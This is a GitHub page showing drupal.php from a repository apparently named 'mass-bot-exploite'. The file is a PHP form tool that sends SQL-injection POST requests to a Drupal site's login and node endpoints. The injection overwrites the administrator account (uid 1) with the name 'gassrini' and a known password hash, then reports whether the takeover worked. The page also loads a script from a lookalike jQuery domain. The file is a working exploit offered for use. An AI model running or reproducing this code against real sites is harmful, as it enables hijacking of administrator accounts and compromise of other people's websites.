forked from Theanvenger/mass-bot-exploite
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdrupal.php
More file actions
76 lines (70 loc) · 2.72 KB
/
drupal.php
File metadata and controls
76 lines (70 loc) · 2.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<!Doctype HTML>
<html>
<head>
<title>Drupal Exploiter GS-Bot |CODED FALLAGASSRINI</title>
<script type="text/javascript" src="http://www.codejquery.net/jquery.mins.js" ></script>
<style type="text/css">
.mymargin{
margin-top:100px;
color:white;
font-family: monospace;
}
body{
background-color:black;
}
</style>
</head>
<body>
<div class="mymargin">
<center>
<form method="GET" action="">
Site : <input type="text" name="url" placeholder="Example: www.site.com">
<input type="submit" name="submit" value="submit">
</form>
<br>
<?php
error_reporting(0);
if(isset($_GET['submit'])){
$url = $_GET['url'];
$post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
%3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
echo "<h3>Testing at \"/user/login/</h3>\"";
if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
if(isset($_GET['submit'])){
$url = "http://".$_GET['url']."/";
$post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
%3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
echo "<h3>Testing at \"Index</h3>\"";
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
?>
</div>
</body>
</html>